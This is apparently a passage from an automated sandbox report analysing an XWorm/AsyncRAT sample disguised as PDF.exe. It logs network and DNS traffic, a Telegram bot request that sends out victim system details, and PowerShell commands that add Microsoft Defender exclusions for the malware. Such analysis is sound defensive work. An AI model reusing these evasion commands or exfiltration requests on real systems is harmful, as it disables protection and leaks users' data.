                                                        Sep 1, 2024 18:15:56.626903057 CEST647565006185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:15:56.626990080 CEST650066475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:56.648071051 CEST650066475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:56.652941942 CEST647565006185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:15:58.423763037 CEST647565006185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:15:58.423954964 CEST650066475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:58.426965952 CEST650066475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:58.429780006 CEST650076475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:58.431744099 CEST647565006185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:15:58.434873104 CEST647565007185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:15:58.434946060 CEST650076475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:58.448776007 CEST650076475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:58.462188959 CEST647565007185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:15:59.645992994 CEST650076475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:59.653423071 CEST647565007185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:15:59.739696026 CEST650076475192.168.2.4185.141.35.22
                                                        Sep 1, 2024 18:15:59.745290041 CEST647565007185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:16:00.227461100 CEST647565007185.141.35.22192.168.2.4
                                                        Sep 1, 2024 18:16:00.227583885 CEST650076475192.168.2.4185.141.35.22

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 1, 2024 18:13:58.097989082 CEST6309153192.168.2.41.1.1.1
                                                        Sep 1, 2024 18:13:58.105122089 CEST53630911.1.1.1192.168.2.4
                                                        Sep 1, 2024 18:14:16.590696096 CEST53597271.1.1.1192.168.2.4
                                                        Sep 1, 2024 18:14:51.386421919 CEST6459453192.168.2.41.1.1.1
                                                        Sep 1, 2024 18:14:51.393646955 CEST53645941.1.1.1192.168.2.4
                                                        Sep 1, 2024 18:14:55.853003979 CEST5716153192.168.2.41.1.1.1
                                                        Sep 1, 2024 18:14:56.645359993 CEST53571611.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 1, 2024 18:13:58.097989082 CEST192.168.2.41.1.1.10x41ffStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                        Sep 1, 2024 18:14:51.386421919 CEST192.168.2.41.1.1.10xe315Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                        Sep 1, 2024 18:14:55.853003979 CEST192.168.2.41.1.1.10xb92Standard query (0)tr3.localto.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 1, 2024 18:13:58.105122089 CEST1.1.1.1192.168.2.40x41ffNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                        Sep 1, 2024 18:14:51.393646955 CEST1.1.1.1192.168.2.40xe315No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                        Sep 1, 2024 18:14:56.645359993 CEST1.1.1.1192.168.2.40xb92No error (0)tr3.localto.net185.141.35.22A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • api.telegram.org
                                                        • ip-api.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449730208.95.112.180732C:\Users\user\Desktop\PDF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 1, 2024 18:13:58.121164083 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                        Host: ip-api.com
                                                        Connection: Keep-Alive
                                                        Sep 1, 2024 18:13:58.608206034 CEST175INHTTP/1.1 200 OK
                                                        Date: Sun, 01 Sep 2024 16:13:58 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 6
                                                        Access-Control-Allow-Origin: *
                                                        X-Ttl: 60
                                                        X-Rl: 44
                                                        Data Raw: 66 61 6c 73 65 0a
                                                        Data Ascii: false


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.464986149.154.167.220443732C:\Users\user\Desktop\PDF.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-01 16:14:52 UTC410OUTGET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB97C9347C020046B4843%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20PYW79587S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: Keep-Alive
                                                        2024-09-01 16:14:52 UTC344INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0
                                                        Date: Sun, 01 Sep 2024 16:14:52 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 55
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2024-09-01 16:14:52 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:12:13:53
                                                        Start date:01/09/2024
                                                        Path:C:\Users\user\Desktop\PDF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\PDF.exe"
                                                        Imagebase:0x640000
                                                        File size:144'384 bytes
                                                        MD5 hash:887DC892255E963FC4D834FFD5D92079
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2898462305.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:1
                                                        Start time:12:13:57
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:12:13:57
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:12:14:04
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PDF.exe'
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:12:14:04
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:12:14:13
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:12:14:14
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:12:14:29
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:12:14:29
                                                        Start date:01/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:12:15:03
                                                        Start date:01/09/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XClient.exe"
                                                        Imagebase:0xbc0000
                                                        File size:144'384 bytes
                                                        MD5 hash:887DC892255E963FC4D834FFD5D92079
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 87%, ReversingLabs
                                                        • Detection: 81%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:12:15:11
                                                        Start date:01/09/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XClient.exe"
                                                        Imagebase:0x790000
                                                        File size:144'384 bytes
                                                        MD5 hash:887DC892255E963FC4D834FFD5D92079
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:21.5%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:10.3%
                                                          Total number of Nodes:29
                                                          Total number of Limit Nodes:0
                                                          execution_graph 5005 7ffd9b7c8971 5006 7ffd9b7c89af RtlSetProcessIsCritical 5005->5006 5008 7ffd9b7c8fc2 5006->5008 5014 7ffd9b7c9751 5015 7ffd9b7c9770 SetWindowsHookExW 5014->5015 5017 7ffd9b7c9821 5015->5017 4983 7ffd9b7c9864 4984 7ffd9b7c986d 4983->4984 4985 7ffd9b7c980f SetWindowsHookExW 4984->4985 4987 7ffd9b7c988b 4984->4987 4986 7ffd9b7c9821 4985->4986 5000 7ffd9b7c9004 5001 7ffd9b7c900d 5000->5001 5002 7ffd9b7c8faf RtlSetProcessIsCritical 5001->5002 5004 7ffd9b7c902b 5001->5004 5003 7ffd9b7c8fc2 5002->5003 4992 7ffd9b7c94ed 4993 7ffd9b7c94ff 4992->4993 4996 7ffd9b7c8a40 4993->4996 4995 7ffd9b7c953b 4997 7ffd9b7c8a49 SetWindowsHookExW 4996->4997 4999 7ffd9b7c9821 4997->4999 4999->4995 5009 7ffd9b7c8edd 5010 7ffd9b7c8f0b RtlSetProcessIsCritical 5009->5010 5011 7ffd9b7c8e8f 5009->5011 5013 7ffd9b7c8fc2 5010->5013 4988 7ffd9b7c72a1 4989 7ffd9b7c72ee CheckRemoteDebuggerPresent 4988->4989 4991 7ffd9b7c735f 4989->4991

                                                          Executed Functions

                                                          Function 00007FFD9B7C72A1 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 376 7ffd9b7c72a1-7ffd9b7c735d CheckRemoteDebuggerPresent 379 7ffd9b7c7365-7ffd9b7c73a8 376->379 380 7ffd9b7c735f 376->380 380->379
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID: CheckDebuggerPresentRemote
                                                          • String ID:
                                                          • API String ID: 3662101638-0
                                                          • Opcode ID: 1cb1e484a6834fc70df86306587826ba8fa572a83f782caf1024425f16462a68
                                                          • Instruction ID: 121723ec8f9b0a49199431439b6880efc02776e709cbea9a66fbb8df1e9d8bfb
                                                          • Opcode Fuzzy Hash: 1cb1e484a6834fc70df86306587826ba8fa572a83f782caf1024425f16462a68
                                                          • Instruction Fuzzy Hash: 2D31F23190875C8FCB58DF58C84ABE97BE0FF65321F0542AED489D7292DB34A846CB91
                                                          Function 00007FFD9B7C58E6 Relevance: .5, Instructions: 476COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d2fee53501e1b09c92e381421b239d940944de68009604a5419117bbbf0325d
                                                          • Instruction ID: 341bb7337737a1ff7876c6d18ff772d12ad9b7f95b9ea0cc4dfb3200822b18e8
                                                          • Opcode Fuzzy Hash: 3d2fee53501e1b09c92e381421b239d940944de68009604a5419117bbbf0325d
                                                          • Instruction Fuzzy Hash: 6BF18330A09B8D4FEBA8EF28C8567F977D1EF54310F04426EE84DC72A5DB7599418B81
                                                          Function 00007FFD9B7C6692 Relevance: .5, Instructions: 461COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0576820fde44d2630b65b33907d01169d1fad35aa135a255dba35d95944861a6
                                                          • Instruction ID: 259a8d1a7c77dc21c91c809d3dc920ebf7bb1bd8c0243cd70ff36bd46a7ad6b8
                                                          • Opcode Fuzzy Hash: 0576820fde44d2630b65b33907d01169d1fad35aa135a255dba35d95944861a6
                                                          • Instruction Fuzzy Hash: 0AE1C430A09A8D8FEBA8EF28C8A57F977D1EF54310F14426EE84DC72A5DB74D9448781
                                                          Function 00007FFD9B7C1BB1 Relevance: .4, Instructions: 390COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e850e60ef845b3cf3e5cf4805ac3c386b226e872e07364d2bfb0dab98a5be376
                                                          • Instruction ID: c6c8e7b081720800a879b803279d45d7923f14e8f169e2f7372f12f56da4b183
                                                          • Opcode Fuzzy Hash: e850e60ef845b3cf3e5cf4805ac3c386b226e872e07364d2bfb0dab98a5be376
                                                          • Instruction Fuzzy Hash: 32C1BF70B1EA4D5FEB98EB6884756B977D2EF98301F05427DE04EC33E2DE28A9018741
                                                          Function 00007FFD9B7C9004 Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4a41937f7e5e59188c52737d7637b38e5bb3ad8f1c89db8c8ddba3a0c52ea76
                                                          • Instruction ID: cb5fd49ee6f955ce880f96d3c2c81752fe990dc3e2324d8a9d932f1a27d85bf3
                                                          • Opcode Fuzzy Hash: a4a41937f7e5e59188c52737d7637b38e5bb3ad8f1c89db8c8ddba3a0c52ea76
                                                          • Instruction Fuzzy Hash: AEB1CA20B589495BEB58B7AC9466BBDB3D2EFD8700F6542B5E01DC33DBCD18AC014792
                                                          Function 00007FFD9B7C8EDD Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID: CriticalProcess
                                                          • String ID:
                                                          • API String ID: 2695349919-0
                                                          • Opcode ID: ac57aa9b2c6764663b3d8bb47de7f1869ae28f9725973495b9c2f2aaa224d662
                                                          • Instruction ID: 5e6f63d7b7cb4042e1bf0b35be089323f2ffe6c3c16c7e0643eea927082a08d3
                                                          • Opcode Fuzzy Hash: ac57aa9b2c6764663b3d8bb47de7f1869ae28f9725973495b9c2f2aaa224d662
                                                          • Instruction Fuzzy Hash: 1941153190C7488FD728DFA8D855AF9BBF0EF56311F04416ED09AC3692CB346446CB91
                                                          Function 00007FFD9B7C8971 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 343 7ffd9b7c8971-7ffd9b7c8f5a 347 7ffd9b7c8f62-7ffd9b7c8fc0 RtlSetProcessIsCritical 343->347 348 7ffd9b7c8fc8-7ffd9b7c8ffd 347->348 349 7ffd9b7c8fc2 347->349 349->348
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID: CriticalProcess
                                                          • String ID:
                                                          • API String ID: 2695349919-0
                                                          • Opcode ID: 79af346b4140783897ff622a6229656650feb6842aa9d2b0ec04f5edbb5c7c86
                                                          • Instruction ID: 9af7b95a5a438fa149a5a79b3e6fdd5ea13fef91a038d1d33c6c0507634c515e
                                                          • Opcode Fuzzy Hash: 79af346b4140783897ff622a6229656650feb6842aa9d2b0ec04f5edbb5c7c86
                                                          • Instruction Fuzzy Hash: 5541153190C7888FDB2ADB688C556A97BF0EF56315F0501AFD0DAD7293CA346846C7A1
                                                          Function 00007FFD9B7C8A40 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 351 7ffd9b7c8a40-7ffd9b7c97cd 356 7ffd9b7c9859-7ffd9b7c985d 351->356 357 7ffd9b7c97d3-7ffd9b7c97e0 351->357 358 7ffd9b7c97e2-7ffd9b7c981f SetWindowsHookExW 356->358 357->358 360 7ffd9b7c9827-7ffd9b7c9858 358->360 361 7ffd9b7c9821 358->361 361->360
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: 8c5d0e49ad0c0b5ab988985282ecf9ce2ba5df48d09914d7f7cd8552123baaa1
                                                          • Instruction ID: 993fdc1429b60533f4844f61a1b9378cc9af64a5802b647d61c2bc774f186d07
                                                          • Opcode Fuzzy Hash: 8c5d0e49ad0c0b5ab988985282ecf9ce2ba5df48d09914d7f7cd8552123baaa1
                                                          • Instruction Fuzzy Hash: 9A31F531A0CA5C4FDB58EF6C984A6B9B7E1EB99311F10427ED00DD32A2CB61A802C7C1
                                                          Function 00007FFD9B7C9751 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 364 7ffd9b7c9751-7ffd9b7c97cd 368 7ffd9b7c9859-7ffd9b7c985d 364->368 369 7ffd9b7c97d3-7ffd9b7c97e0 364->369 370 7ffd9b7c97e2-7ffd9b7c981f SetWindowsHookExW 368->370 369->370 372 7ffd9b7c9827-7ffd9b7c9858 370->372 373 7ffd9b7c9821 370->373 373->372
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: ba14012df33fb81c1767e6dab71b99f740dbd1b79e4e8cd0a56971a581ded535
                                                          • Instruction ID: ac616c1830f3b9ffa44beb3942da1097953a69badffd50076cb4ca1fd7fffcf5
                                                          • Opcode Fuzzy Hash: ba14012df33fb81c1767e6dab71b99f740dbd1b79e4e8cd0a56971a581ded535
                                                          • Instruction Fuzzy Hash: 4A311831A0CA5C4FDB58EF68D85A6F97BE1EF99311F04427ED049D3292CB25A802C781
                                                          Function 00007FFD9B7C9864 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2940955859.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b7c0000_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a319996130970172d15400e57cd90908b2884e2e74478f1a7e45daae4b89723
                                                          • Instruction ID: 3775ac32fd6339546da8d8ea87fe2119c3f7d439664f1237a3813772664a710a
                                                          • Opcode Fuzzy Hash: 3a319996130970172d15400e57cd90908b2884e2e74478f1a7e45daae4b89723
                                                          • Instruction Fuzzy Hash: 2E210B31B0CA4C4FDF59EB6C98566F8B7E1EF99320F04426ED00DD32A2CA25A852C795

                                                          Executed Functions

                                                          Function 00007FFD9B8A6605 Relevance: .4, Instructions: 439COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1746006320.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0194105e598bfba0770b51c9a87c3092c59f4d791b6a428be5c107284833ef0d
                                                          • Instruction ID: e826781555916ed22658fb0790ff795e5b28eebfa3a5810cedf8f2100cb455cd
                                                          • Opcode Fuzzy Hash: 0194105e598bfba0770b51c9a87c3092c59f4d791b6a428be5c107284833ef0d
                                                          • Instruction Fuzzy Hash: 19D16872A0FACE4FEB659B6848655B5BBE1EF1A310B0901FFD45CC70EBD918A805C361
                                                          Function 00007FFD9B7D9738 Relevance: .1, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1745674260.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 753b684a66f22eaf6f9ee95e22c6ec4cd57ce55badf2f95d2d92285f8c4b788d
                                                          • Instruction ID: 219613282cbd6475fba030181abc3393a5f3e0a04920b9bbb2f3652856bca10e
